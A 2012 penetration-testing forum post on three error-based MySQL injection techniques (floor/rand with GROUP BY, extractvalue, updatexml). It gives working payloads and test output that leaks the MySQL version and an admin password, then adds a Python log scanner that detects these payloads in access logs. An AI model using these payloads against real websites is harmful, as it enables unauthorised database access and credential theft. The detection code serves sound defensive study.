China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: On three error-based techniques in MySQL injection

Author: admin    Time: 2012-12-10 10:28
Title: On three error-based techniques in MySQL injection
Posting some of my old notes. MySQL throws an error message when a statement fails, and sites built on PHP+MySQL often print that error text straight onto the page, so specific data can be retrieved by constructing statements in the following three ways.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Triggering an error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version string is leaked in the duplicate-key error. To retrieve other data, replace the version() expression with the query you need.
For example, to retrieve the administrator's user name and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
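As an added example (not code from the post), the following Python scans web-server access-log lines for the three error-based signatures described above: floor(rand(0)*2) combined with GROUP BY, extractvalue(), and updatexml(). The log lines, client IPs and script paths are constructed; the query-string payloads are the post's own, URL-encoded as a browser would send them.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# One regex per technique from the post, applied to a canonicalised query string
# (decoded, lower-cased, whitespace collapsed, no spaces around ( ) * ,).
SIGNATURES = {
    "floor-rand-groupby": re.compile(
        r"floor\(rand\(0\)\*2\).*group by|group by.*floor\(rand\(0\)\*2\)"),
    "extractvalue": re.compile(r"\bextractvalue\("),
    "updatexml": re.compile(r"\bupdatexml\("),
}

def canonicalise(raw_query: str) -> str:
    """Undo %XX/+ encoding twice (catches double encoding), lower-case, and
    strip whitespace tricks so one regex form covers the usual variants."""
    s = unquote_plus(unquote_plus(raw_query)).lower()
    s = re.sub(r"\s+", " ", s)
    return re.sub(r"\s*([()*,])\s*", r"\1", s)

def classify(request_target: str) -> list[str]:
    """Names of every signature matched by the query string of one request."""
    query = urlsplit(request_target).query
    if not query:
        return []
    canon = canonicalise(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(canon)]

def scan_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """(line number, matched signatures) for each suspicious access-log line."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m and (hits := classify(m.group(1))):
            findings.append((no, hits))
    return findings

# Constructed sample lines in Apache combined format (not from the post);
# lines 2-4 carry the post's three payloads, URL-encoded as a browser would.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2012:10:28:01 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Dec/2012:10:28:05 +0800] "GET /article.php?id=1%20and%20(select%201%20from%20'
    '(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 500 211',
    '192.0.2.10 - - [10/Dec/2012:10:28:09 +0800] "GET /article.php?id=1%20and%20extractvalue(1,'
    'concat(0x5c,(select%20table_name%20from%20information_schema.tables%20limit%201))) HTTP/1.1" 500 198',
    '192.0.2.10 - - [10/Dec/2012:10:28:14 +0800] "GET /article.php?id=1+AND+1%3D(UpdateXML(1,'
    'concat(0x5e24,(select+user()),0x5e24),1)) HTTP/1.1" 500 190',
    '198.51.100.7 - - [10/Dec/2012:10:29:00 +0800] "GET /search.php?q=floor+plans HTTP/1.1" 200 1024',
]
```

Run `scan_log(SAMPLE_LOG)` to get the flagged line numbers with their matched technique; a 500 status next to such a request is the secondary signal that the application really did surface the MySQL error.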
All, thanks foreign guys.
Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2